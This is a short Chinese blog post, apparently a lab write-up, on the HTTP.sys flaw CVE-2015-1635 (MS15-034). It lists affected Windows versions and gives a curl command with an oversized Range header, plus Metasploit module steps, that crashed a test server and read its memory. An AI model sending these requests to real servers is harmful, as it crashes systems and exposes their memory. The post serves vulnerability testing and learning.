目录
漏洞编号:CVE-2015-1635(MS15-034 ) 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中, 当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
任何安装了微软IIS 6.0以上的 Win Server 2008 R2、 Win Server 2012、 Win Server 2012 R2、 Win 7、 Win 8、 Win 8.1
(1)远程读取IIS服务器的内存数据, (2)使服务器系统蓝屏崩溃。
环境:win2008 r2 ,iis7.5
(一)利用curl
curl -v IP -H “Host:irrelevant” -H “Range: bytes=0-18446744073709551615” 用的时候仅仅修改IP就行;这个IP可以是:纯IP、IP加端口号、域名。
如果服务器存在HTTP.SYS远程代码执行漏洞,那么响应状态应该有:
HTTP/1.1 416 Requested Range Not Satisfiable
如果服务器打上了补丁,那么响应状态应该是:
HTTP Error 400. The request has an invalid header name.
进行发包,这里并没有成功,不存在这个漏洞
win7安装iis服务 https://jingyan.baidu.com/article/219f4bf723bcb2de442d38ed.html
web界面如下
发送数据包,漏洞存在
search ms 15-034
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts xxx
run
但是这里的状态码并不是 HTTP/1.1 416 Requested Range Not Satisfiable,但还是成功了
服务器瞬间蓝屏然后重启了
—— 心,若没有栖息的地方,到哪里都是流浪
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/161405.html原文链接:https://javaforall.cn